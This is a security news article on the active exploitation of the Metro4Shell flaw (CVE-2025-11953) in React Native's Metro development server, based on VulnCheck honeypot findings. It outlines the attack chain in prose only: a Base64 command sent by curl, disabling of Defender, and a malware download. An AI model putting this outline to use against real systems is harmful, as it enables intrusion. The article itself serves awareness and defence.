Hackers Exploit Critical Flaw in React Native for Over a Month
TL;DR
Since December 21, 2025, cybercriminals have been exploiting a severe security vulnerability in the <strong>Metro Development Server</strong>, an essential component of the <strong>React Native</strong> platform, which allows for the creation of mobile applications for Android and iOS.
Since December 21, 2025, cybercriminals have been exploiting a severe security vulnerability in the Metro Development Server, an essential component of the React Native platform, which allows for the creation of mobile applications for Android and iOS. This vulnerability, known as CVE-2025-11953 and dubbed Metro4Shell, has a score of 9.8 on a scale that goes up to 10, indicating its severity.
The discovery was made by researchers from the cybersecurity company VulnCheck, using honeypot systems that monitor real attacks. The hackers' interest is focused on an endpoint known as \/open-url, which in default configurations may expose the server to the internet.
Vulnerable Development Environment
The Metro serves as a development server that "packages" JavaScript code, allowing developers to test their applications. If exposed, any user can send a simple request to the vulnerable endpoint and execute commands on the system without authentication.
The vulnerability was initially documented by the company JFrog in November 2025, which published a technical analysis. After that, several proofs of concept emerged on GitHub, facilitating the attack even for less experienced intruders.
Attack Method
The repetitive nature of the attacks captured by VulnCheck revealed a pattern. Attacks occurred on three distinct dates, always using the same malicious files, setting up a well-structured cyber operation.
The attack consists of five stages. First, the criminals use the curl tool to send a command through the vulnerable endpoint, disguised in Base64. After decoding, the script identifies working directories and disables protections from Microsoft Defender.
Once the defenses are compromised, the script establishes a connection with a server controlled by the intruders and downloads a malicious executable, which is then executed with encrypted arguments.
The malware, written in Rust and packed with UPX, features anti-analysis logic that complicates examinations by security researchers and has a version for Linux, expanding its attack range.
Disconnection Between Perception and Reality
VulnCheck identified a concerning misinformation: while the active exploitation of the vulnerability began in December, many public discussions until the end of January still classified it as a "theoretical risk." The report emphasizes that the attackers' initiatives do not rely on official warnings or security updates.
The Known Exploited Vulnerabilities (KEV), a list maintained by the Cybersecurity & Infrastructure Security Agency (CISA), is often updated late. Development tools like Metro, being widely used, become easy targets, given that they frequently do not receive the same level of monitoring as production systems.
Importance of Early Detection
VulnCheck succeeded in detecting the initial exploitation due to the use of exploits and rules from an intrusion detection system called Suricata. This visibility allowed for the early configuration of systems to identify the attacks as soon as they began.
The company registered CVE-2025-11953 in its list of exploited vulnerabilities on the same day the first attack was observed, demonstrating the importance of continuous vigilance in development environments.
For more news on security and technology, follow TecMundo on social media and subscribe to our newsletter.
Content selected and edited with AI assistance. Original sources referenced above.
